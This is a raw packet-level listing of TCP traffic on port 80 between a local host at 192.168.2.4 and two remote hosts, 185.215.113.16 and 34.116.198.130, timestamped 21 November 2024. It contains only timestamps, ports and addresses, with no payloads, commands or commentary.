                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.685002089 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.685012102 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.685049057 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.686278105 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.686347961 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.686387062 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.687732935 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.687839031 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.687879086 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.687926054 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.687937975 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.687969923 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.688018084 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.688539982 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.688560963 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.688580990 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.688601971 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.689182043 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.689336061 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.689373970 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.689682961 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.689726114 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.689749002 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.689781904 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.690650940 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.690710068 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.690746069 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.690911055 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.690952063 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.691003084 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.691040993 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.692096949 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.692142963 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.692176104 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.692188025 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.692209959 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.692241907 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.692285061 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.693281889 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.693330050 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.693392038 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.693433046 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.693552971 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.693708897 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.693747997 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.694447041 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.694489956 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.694560051 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.694602966 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.694987059 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.695095062 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.695131063 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.695640087 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.695683956 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.695744991 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.695807934 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.696441889 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.696548939 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.696584940 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.696795940 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.696840048 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.696899891 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.696942091 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.698105097 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.698154926 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.698191881 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.698234081 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.699194908 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.699239016 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.699287891 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.699336052 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.700401068 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.700474024 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.700510979 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.700560093 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.701572895 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.701616049 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.701653957 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.701695919 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.702765942 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.702819109 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.703003883 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.703046083 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.703948975 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.703993082 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.704039097 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.704082012 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.705110073 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.705152035 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.705235958 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.705276012 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.706293106 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.706336021 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.706456900 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.706497908 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.707516909 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.707561970 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.707629919 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.707674026 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.708772898 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.708817005 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.708857059 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.708899021 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.710009098 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.710051060 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.710062027 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.710100889 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.711117983 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.711160898 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.711241961 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.711282969 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.712236881 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.712279081 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.712366104 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.712407112 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.713469982 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.713514090 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.713543892 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.713584900 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.714616060 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.714658022 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.714797020 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.714837074 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.715815067 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.715857983 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.715913057 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.715956926 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.717010021 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.717053890 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.717160940 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.717202902 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.718177080 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.718220949 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.718277931 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.718319893 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.719352961 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.719398022 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.719444036 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.719484091 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.720577955 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.720598936 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.720621109 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.720638990 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.721820116 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.721865892 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.721901894 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.721944094 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.722938061 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.722982883 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.723020077 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.723062038 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.724116087 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.724163055 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.724246979 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.724287987 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.725308895 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.725352049 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.725384951 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.725425959 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.726526976 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.726571083 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.726625919 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.726666927 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.727708101 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.727751970 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.727804899 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.727847099 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.728895903 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.728940964 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.729021072 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.729063034 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.730031967 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.730073929 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.730161905 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.730201960 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.731255054 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.731297016 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.731334925 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.731378078 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.732386112 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.732431889 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.732491016 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.732532024 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.732988119 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.733093977 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.733133078 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.733619928 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.733671904 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.733683109 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.733692884 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.733706951 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.733728886 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.733743906 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.734781027 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.734832048 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.734874010 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.734916925 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.734976053 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.734986067 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.735019922 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.736016989 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.736062050 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.736135960 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.736181974 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.736401081 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.736475945 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.736509085 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.737137079 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.737180948 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.737255096 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.737314939 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.737834930 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.737951040 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.737997055 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.738334894 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.738377094 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.738430023 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.738472939 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.739343882 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.739398003 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.739437103 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.739561081 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.739572048 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.739603043 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.739619017 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.740715027 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.740737915 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.740746975 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.740763903 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.740778923 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.741877079 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.741925955 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.741977930 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.742019892 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.743089914 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.743146896 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.743204117 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.743252993 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.744266987 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.744316101 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.744384050 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.744434118 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.745431900 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.745476007 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.745523930 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.745567083 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.788640022 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.831593037 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.831681967 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.831810951 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.831856012 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.831985950 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.833153963 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.833204985 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.833276033 CET804980334.116.198.130192.168.2.4
